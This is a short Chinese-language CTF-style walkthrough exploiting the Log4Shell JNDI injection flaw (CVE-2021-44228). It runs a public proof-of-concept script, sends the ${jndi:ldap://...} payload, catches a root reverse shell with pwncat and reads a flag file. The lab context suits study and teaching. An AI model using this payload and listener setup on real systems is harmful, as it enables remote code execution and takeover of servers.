CVE-2021-44228

信息

Tags

Apache Log4j2 lookup JNDI 注入漏洞

官方数据库记录

Apache Log4j2 2.0-beta9 到 2.15.0（不包括安全版本 2.12.2、2.12.3 和 2.3.1）配置、日志消息和参数中使用的 JNDI 功能不能防止攻击者控制的 LDAP 和其他 JNDI 相关端点。当启用消息查找替换时，可以控制日志消息或日志消息参数的攻击者可以执行从 LDAP 服务器加载的任意代码。从 log4j 2.15.0 开始，此行为已默认禁用。从版本 2.16.0（以及 2.12.2、2.12.3 和 2.3.1）开始，此功能已被完全删除。请注意，此漏洞特定于 log4j-core，不会影响 log4net、log4cxx 或其他 Apache 日志服务项目。

直接使用 kozmer/log4j-shell-poc: A Proof-Of-Concept for the CVE-2021-44228 vulnerability. 进行攻击

root@jmt-projekt:~/log4j-shell-poc# python3 poc.py --userip 139.*.*.* --webport 8080 --lport 9999

[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-poc

[+] Exploit java class created success
[+] Setting up LDAP server

[+] Send me: ${jndi:ldap://139.*.*.*:1389/a}
[+] Starting Webserver on port 8080 http://0.0.0.0:8080

Listening on 0.0.0.0:1389

然后建立一个监听器，将 ${jndi:ldap://139.*.*.*:1389/a} 传输到靶机上执行，即可收到回连的 shell

root@jmt-projekt:~# pwncat-cs -lp 9999
[16:56:09] Welcome to pwncat 🐈!                                                                                                                                                                 __main__.py:164
[16:56:24] received connection from 39.106.20.178:38887                                                                                                                                               bind.py:84
[16:56:26] 0.0.0.0:9999: upgrading from /bin/dash to /bin/bash                                                                                                                                    manager.py:957
[16:56:27] 39.106.20.178:38887: registered new host w/ db                                                                                                                                         manager.py:957
(local) pwncat$ back
(remote) root@engine-2:/usr/local/tomcat# whoami
root
(remote) root@engine-2:/# cat /flag
flag{d23fe301-6f8f-4210-831a-96352d07d4c1}